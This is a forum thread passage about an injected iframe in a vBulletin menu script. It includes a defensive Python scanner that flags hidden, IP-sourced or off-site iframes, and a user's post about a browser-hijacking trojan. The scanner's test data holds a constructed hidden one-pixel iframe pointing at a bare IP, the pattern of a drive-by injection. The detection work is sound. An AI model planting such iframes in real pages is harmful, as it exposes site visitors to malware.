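The host's rkhunter and ClamAV scans came back clean while Sophos was flagging an injected iframe in vbulletin_menu.php, which is typical: signature scanners look for known binaries, not a few lines of HTML appended to a script file. The following is an added example, not code from this thread, its host or vBulletin, of a content check over the web root that flags iframes with hidden geometry, a bare-IP src (as in the AVG report above), or an off-site host; the sample file contents, the 198.51.100.23 address and the /var/www/forums path are constructed for the example.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# 0/1-pixel geometry or hidden styling: how an injected frame stays invisible
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*[=:]\s*["']?\s*[01](?:px)?\b|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE)
# src that names a bare IP address instead of a hostname
IP_HOST_RE = re.compile(r"^(?:https?:)?//\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)", re.IGNORECASE)


def suspicious_iframes(text, allowed_hosts=("www.redszone.com",)):
    """Return [(src, [reasons])] for every iframe in text that looks injected."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src_m = SRC_RE.search(tag)
        src = src_m.group(1) if src_m else ""
        reasons = []
        if HIDDEN_RE.search(tag):
            reasons.append("hidden-geometry")
        if IP_HOST_RE.match(src):
            reasons.append("ip-literal-src")
        host = urlparse(src).hostname if "//" in src else None  # relative src: same origin
        if host and host not in allowed_hosts:
            reasons.append("external-host")
        if reasons:
            findings.append((src, reasons))
    return findings


def scan_tree(root, exts=(".php", ".js", ".html", ".htm")):
    """Walk a web root and map each file (relative path) to the iframes flagged in it."""
    root = Path(root)
    hits = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            found = suspicious_iframes(p.read_text(errors="replace"))
            if found:
                hits[str(p.relative_to(root))] = found
    return hits


# Constructed samples: a menu-script file with a hidden frame appended, and a benign embed.
SAMPLE_INJECTED = ('var vbmenu_hide_delay = 500;\n<iframe src="http://198.51.100.23/Home/index.php"'
                   ' width="1" height="1" style="visibility:hidden"></iframe>\n')
SAMPLE_CLEAN = '<iframe src="https://www.redszone.com/forums/embed.php" width="600"></iframe>'

if __name__ == "__main__":
    print(suspicious_iframes(SAMPLE_INJECTED))
    print(scan_tree("/var/www/forums"))  # hypothetical web root
```

Run it from cron against the document root and diff the output against the previous run; a new hit in a file such as clientscript/vbulletin_menu.php is the signal the server-side AV scans in this thread could not give.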

BLEEDS
01-23-2012, 10:44 PM
I had one about a month ago - trojan got in and I have Windows 7 and McAfee - got the one where it takes over all your IE pages and asks you to install "Win7 security" or something, nasty little bugger.

Had to call McAfee and get it scrubbed, and they updated their database. Yikes.

Definitely had to do with ads. Ah well, yet another reason to pay the site fee - I figure I've broken even, given that I hadn't posted in a while ;-)!

PEACE
-BLEEDS